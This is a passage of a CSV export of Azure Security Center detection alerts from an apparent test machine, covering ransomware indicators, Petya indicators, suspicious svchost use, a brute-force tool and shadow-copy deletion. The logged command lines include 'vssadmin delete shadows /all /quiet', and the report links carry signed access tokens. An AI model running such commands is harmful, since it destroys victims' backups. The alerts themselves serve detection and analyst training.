""StartTimeUtc"": ""2019-01-15T13:15:16.6161476Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.6161476Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
158,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:18,2019-01-15 13:15:18,636ab38f-2528-4356-8602-d0910f8ac600,2518547426817428483_636ab38f-2528-4356-8602-d0910f8ac600,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1bc4"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=73fMV7Ybuo9CGINgrTRvGVKp5HKA1UVnhiGPZqkdK2Q%3D&spr=https&st=2019-01-15T11:39:21Z&se=2019-04-15T11:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1bc4"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:18.2571516Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:18.2571516Z"",
""EndTimeUtc"": ""2019-01-15T13:15:18.2571516Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
159,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:18,2019-01-15 13:15:18,a4aa878d-93b5-4cd1-931f-30f85b9e6db2,2518547426817928329_a4aa878d-93b5-4cd1-931f-30f85b9e6db2,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b68"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=9E83f2V9Ix17hs7kF%2B%2FwVNoEivLC4GV%2FfNgRULmjp4U%3D&spr=https&st=2019-01-15T13:00:23Z&se=2019-04-15T13:15:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b68"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:18.207167Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:18.207167Z"",
""EndTimeUtc"": ""2019-01-15T13:15:18.207167Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
160,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,88f9ae7a-e6b5-4b54-b967-08f3fc503d91,2518547426830640211_88f9ae7a-e6b5-4b54-b967-08f3fc503d91,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often uses SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1984"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=igCs0cA7B2rarN4kGRqCl473qJZoP8z6s8skpsDaBS0%3D&spr=https&st=2019-01-15T11:43:53Z&se=2019-04-15T11:58:53Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=a59677a1-917d-436c-8ede-6cc8220c9a45\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1984"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.9359788Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:16.9359788Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.9359788Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
161,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,b6e594ea-16d3-480e-81a7-2f8fe3af64ba,2518547426833434810_b6e594ea-16d3-480e-81a7-2f8fe3af64ba,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware, and specifically ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x18bc"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=73fMV7Ybuo9CGINgrTRvGVKp5HKA1UVnhiGPZqkdK2Q%3D&spr=https&st=2019-01-15T11:39:21Z&se=2019-04-15T11:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x18bc"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.6565189Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:16.6565189Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.6565189Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
162,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:17,2019-01-15 13:15:17,846ec406-bb3e-451b-bf6f-9e1e17a69bd6,2518547426829675756_846ec406-bb3e-451b-bf6f-9e1e17a69bd6,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1990"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1990"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:17.0324243Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:17.0324243Z"",
""EndTimeUtc"": ""2019-01-15T13:15:17.0324243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
163,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,a513ab17-2b6a-4b1a-a925-a0b3c21ec38c,2518547426831794607_a513ab17-2b6a-4b1a-a925-a0b3c21ec38c,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often uses SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x195c"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=kvCGJKKTPVYOeqAGnf8mV2pt8v2FotidDHnSqPJHG3Y%3D&spr=https&st=2019-01-15T11:49:35Z&se=2019-04-15T12:04:35Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x195c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.8205392Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:16.8205392Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.8205392Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
164,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:15,2019-01-15 13:15:15,caa12d6c-4928-4787-90d4-cb27ff94373c,2518547426847947731_caa12d6c-4928-4787-90d4-cb27ff94373c,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1968"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1968"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:15.2052268Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:15.2052268Z"",
""EndTimeUtc"": ""2019-01-15T13:15:15.2052268Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
165,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:18,2019-01-15 17:15:18,34cc156e-9179-44c4-bd60-89dd1812e9e7,2518547282814913644_34cc156e-9179-44c4-bd60-89dd1812e9e7,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often uses SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x10dc"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=bPqI7AyBQickCDAwmDAc6APVZVb9pLEFo0ITaXfoM1U%3D&spr=https&st=2019-01-15T11:59:35Z&se=2019-04-15T12:14:35Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x10dc"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:18.5086355Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:18.5086355Z"",
""EndTimeUtc"": ""2019-01-15T17:15:18.5086355Z"",
